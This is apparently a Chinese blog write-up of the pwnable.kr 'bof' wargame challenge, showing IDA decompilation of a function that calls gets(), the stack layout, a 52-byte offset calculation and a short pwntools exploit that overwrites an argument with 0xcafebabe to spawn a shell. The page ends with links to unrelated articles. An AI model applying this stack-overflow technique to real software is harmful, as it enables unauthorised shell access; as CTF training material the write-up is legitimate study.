pwnable.kr第三题bof
Running at : nc pwnable.kr 9000
IDA查看
1 unsigned int __cdecl func(int a1)
2 {
3 char s; // [esp+1Ch] [ebp-2Ch]
4 unsigned int v3; // [esp+3Ch] [ebp-Ch]
5
6 v3 = __readgsdword(0x14u);
7 puts("overflow me : ");
8 gets(&s);//未对输入长度进行限制,存在栈溢出
9 if ( a1 == 0xCAFEBABE )
10 system("/bin/sh");
11 else
12 puts("Nah..");
13 return __readgsdword(0x14u) ^ v3;
14 }
查看栈,
1 -0000002C s db ?
2 -0000002B db ? ; undefined
3 -0000002A db ? ; undefined
4 -00000029 db ? ; undefined
5 -00000028 db ? ; undefined
6 -00000027 db ? ; undefined
7 -00000026 db ? ; undefined
8 -00000025 db ? ; undefined
9 -00000024 db ? ; undefined
10 -00000023 db ? ; undefined
11 -00000022 db ? ; undefined
12 -00000021 db ? ; undefined
13 -00000020 db ? ; undefined
14 -0000001F db ? ; undefined
15 -0000001E db ? ; undefined
16 -0000001D db ? ; undefined
17 -0000001C db ? ; undefined
18 -0000001B db ? ; undefined
19 -0000001A db ? ; undefined
20 -00000019 db ? ; undefined
21 -00000018 db ? ; undefined
22 -00000017 db ? ; undefined
23 -00000016 db ? ; undefined
24 -00000015 db ? ; undefined
25 -00000014 db ? ; undefined
26 -00000013 db ? ; undefined
27 -00000012 db ? ; undefined
28 -00000011 db ? ; undefined
29 -00000010 db ? ; undefined
30 -0000000F db ? ; undefined
31 -0000000E db ? ; undefined
32 -0000000D db ? ; undefined
33 -0000000C var_C dd ?
34 -00000008 db ? ; undefined
35 -00000007 db ? ; undefined
36 -00000006 db ? ; undefined
37 -00000005 db ? ; undefined
38 -00000004 db ? ; undefined
39 -00000003 db ? ; undefined
40 -00000002 db ? ; undefined
41 -00000001 db ? ; undefined
42 +00000000 s db 4 dup(?)
43 +00000004 r db 4 dup(?)
44 +00000008 arg_0 dd ?
45 +0000000C
46 +0000000C ; end of stack variables
0x2c+8 =0x34=52,来到arg_0的存储空间
exp:
1 from pwn import *
2
3 r = remote('pwnable.kr','9000')
4
5 buf = 52 * 'A'
6 buf += p32(0xcafebabe)
7
8 r.sendline(buf)
9
10 r.interactive()
pwnable.kr第三题bof的更多相关文章
- 【pwnable.kr】fb
这是pwnable.kr的签到题,记录pwn入门到放弃的第一篇. ssh fd@pwnable.kr -p2222 (pw:guest) 题目很简单,登录上了ssh后,发现了3个文件:fd,fd.c, ...
- 【pwnable.kr】blackjack
又一道pwnable nc pwnable.kr 9009 读题找到源代码在:http://cboard.cprogramming.com/c-programming/114023-simple-bl ...
- pwnable.kr之brainf*ck
pwnable.kr之brainf*ck 今天又是被难倒的一天Orz,个人感觉pwnable.kr上的题都比较剑走偏锋,仔细做过去,一定会有很大的收获. 不多说了,今天看的是第二关的第一道题:brai ...
- 【pwnable.kr】bof
pwnable从入门到放弃,第三题. Download : http://pwnable.kr/bin/bofDownload : http://pwnable.kr/bin/bof.c Runnin ...
- pwnable.kr bof之write up
这一题与前两题不同,用到了静态调试工具ida 首先题中给出了源码: #include <stdio.h> #include <string.h> #include <st ...
- pwnable.kr之bof
打开题目: 先下载题目给我们的两个文件,查看文件信息: 发现没有执行的权限,所以先增加文件bof的执行权限,执行: 没发现啥,然后查看代码, #include <stdio.h> #inc ...
- pwnable.kr 第一题fd
使用ssh fd@pwnable.kr -p2222连接输入密码guest 1 fd@prowl:~$ ls -al 2 total 40 3 drwxr-x--- 5 root fd 4096 Oc ...
- pwnable.kr的passcode
前段时间找到一个练习pwn的网站,pwnable.kr 这里记录其中的passcode的做题过程,给自己加深印象. 废话不多说了,看一下题目, 看到题目,就ssh连接进去,就看到三个文件如下 看了一下 ...
- pwnable.kr详细通关秘籍(二)
i春秋作家:W1ngs 原文来自:pwnable.kr详细通关秘籍(二) 0x00 input 首先看一下代码: 可以看到程序总共有五步,全部都满足了才可以得到flag,那我们就一步一步来看 这道题考 ...
随机推荐
- module patterns
module patterns ebooks https://github.com/xyzata/2017-new-ebooks/blob/master/Succinctly/modulepatter ...
- LeetCode 算法题解 js 版 (001 Two Sum)
LeetCode 算法题解 js 版 (001 Two Sum) 两数之和 https://leetcode.com/problems/two-sum/submissions/ https://lee ...
- Web 安全 & cookies & HttpOnly
Web 安全 & cookies & HttpOnly cookie HttpOnly 禁止 js 读取 cookie 的方法 HttpOnly 实现原理 document.cooki ...
- vue & npm & components & plugins
vue & npm & components & plugins how to publish an vue ui component to npm? https://www. ...
- js trigger click event & dispatchEvent & svg element
js trigger click event & dispatchEvent & svg element but svg element not support trigger cli ...
- css & box-shadow & outline
css & box-shadow & outline CSS3 box-shadow : 4 sides symmetry https://learning.xgqfrms.xyz/C ...
- flutter 使用vs编辑windows插件
创建插件 mkdir win_test && cd win_test flutter create -t plugin --platforms windows ./ 找到win_tes ...
- react-app 编写测试
jest Enzyme 文档 为什么要写测试 单元测试(unit testing)指的是以软件的单元(unit)为单位,对软件进行测试.单元可以是一个函数,也可以是一个模块或组件.它的基本特征就是,只 ...
- AttributeError: 'function' object has no attribute 'as_view'
我的描述:当我启用jwt_required来进行token验证的时候,我提示错误; 解决方案: 修改前代码: 修改后代码: 多看书.多多了解.多看看世界...
- 详细探秘Linux 和 Window 双系统访问Windows 磁盘需要输入密码问题解决过程分析
将要讲很多的内容真正产生作用的配置就只有下面这一句而已.如果你只是想要解决问题看这一句就行了,后面都没有必要在看下去了. 将allow-active标签中的auth_admin_keep 改为 yes ...